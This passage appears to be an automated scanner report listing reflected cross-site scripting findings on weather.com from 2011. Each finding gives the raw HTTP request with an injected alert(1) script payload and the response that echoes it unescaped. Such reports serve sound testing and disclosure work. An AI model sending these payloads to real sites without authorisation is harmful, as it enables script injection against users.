s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:19 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x00
X-Varnish: 1156434678
Date: Thu, 24 Mar 2011 17:40:49 GMT
Connection: keep-alive
Content-Length: 159999

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pagelet6673d"><script>alert(1)</script>bb9577b79b5/metrics/" />
...[SNIP]...
1.18. http://www.weather.com/pagelet/metrics/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/metrics/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1cb2"-alert(1)-"13022a50a91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelete1cb2"-alert(1)-"13022a50a91/metrics/?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:24 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x02
X-Varnish: 624705097
Date: Thu, 24 Mar 2011 17:40:54 GMT
Connection: keep-alive
Content-Length: 159916

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
tch(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelete1cb2"-alert(1)-"13022a50a91/metrics/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011"
...[SNIP]...
1.19. http://www.weather.com/pagelet/metrics/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/metrics/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2f9d"-alert(1)-"2fb1a1e8e87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet/metricsc2f9d"-alert(1)-"2fb1a1e8e87/?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:45:59 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x02
X-Varnish: 1510934619
Date: Thu, 24 Mar 2011 17:40:59 GMT
Connection: keep-alive
Content-Length: 108349

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
a/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "60990",
pageURL: "/pagelet/metricsc2f9d"-alert(1)-"2fb1a1e8e87/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...
1.20. http://www.weather.com/pagelet/metrics/ [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/metrics/

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 36fdf<script>alert(1)</script>1309f12375a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet/metrics/?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics36fdf<script>alert(1)</script>1309f12375a HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:45:46 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x01
X-Varnish: 1097007573
Date: Thu, 24 Mar 2011 17:40:46 GMT
Connection: keep-alive
Content-Length: 326


YAHOO.metrics.createMetrics36fdf<script>alert(1)</script>1309f12375a({level1:"HOMEPAGE",
level2:"COMMON",
level3:"",
level4:"",
level5:"",
level6:"",
contentType:"",
detail:"",
title:"",
pagename:"/index.html",
ad_category:"homepage",
ad_family:"",
ad_chann
...[SNIP]...
1.21. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload 60e14><script>alert(1)</script>b10c9baf479 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec9760e14><script>alert(1)</script>b10c9baf479/bc/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:42:04 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x06
X-Varnish: 1156449751
Date: Thu, 24 Mar 2011 17:41:34 GMT
Connection: keep-alive
Content-Length: 160090

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert("XSS")-"370523ec9760e14><script>alert(1)</script>b10c9baf479/bc/favicon2.ico" />
...[SNIP]...
1.22. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d3c1"-alert(1)-"8e5fb02f59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec975d3c1"-alert(1)-"8e5fb02f59/bc/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:42:08 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x06
X-Varnish: 2184735617
Date: Thu, 24 Mar 2011 17:41:38 GMT
Connection: keep-alive
Content-Length: 159983

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
"beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelet8cd82"-alert("XSS")-"370523ec975d3c1"-alert(1)-"8e5fb02f59/bc/favicon2.ico",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/2
...[SNIP]...
1.23. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acf42"><script>alert(1)</script>7682aafa52f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bcacf42"><script>alert(1)</script>7682aafa52f/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:42:13 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x00
X-Varnish: 624720906
Date: Thu, 24 Mar 2011 17:41:43 GMT
Connection: keep-alive
Content-Length: 160117

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<a
                           href="/weather/map/interactive/bcacf42"><script>alert(1)</script>7682aafa52f/favicon2.ico" from="nav_secondary" >
...[SNIP]...
1.24. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 7d1ec><script>alert(1)</script>a55ddb85131 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc7d1ec><script>alert(1)</script>a55ddb85131/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:42:11 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x06
X-Varnish: 1510948709
Date: Thu, 24 Mar 2011 17:41:41 GMT
Connection: keep-alive
Content-Length: 160136

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert("XSS")-"370523ec97/bc7d1ec><script>alert(1)</script>a55ddb85131/favicon2.ico" />
...[SNIP]...
1.25. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 667fa"-alert(1)-"acc2bbdafe0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc667fa"-alert(1)-"acc2bbdafe0/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:42:18 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x01
X-Varnish: 1156454637
Date: Thu, 24 Mar 2011 17:41:48 GMT
Connection: keep-alive
Content-Length: 160042

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
ta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelet8cd82"-alert("XSS")-"370523ec97/bc667fa"-alert(1)-"acc2bbdafe0/favicon2.ico",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2
...[SNIP]...
1.26. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f2ca"-alert(1)-"67dc3956ab6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico4f2ca"-alert(1)-"67dc3956ab6 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:43:46 GMT
Server: Apache
Vary: Accept-Encoding
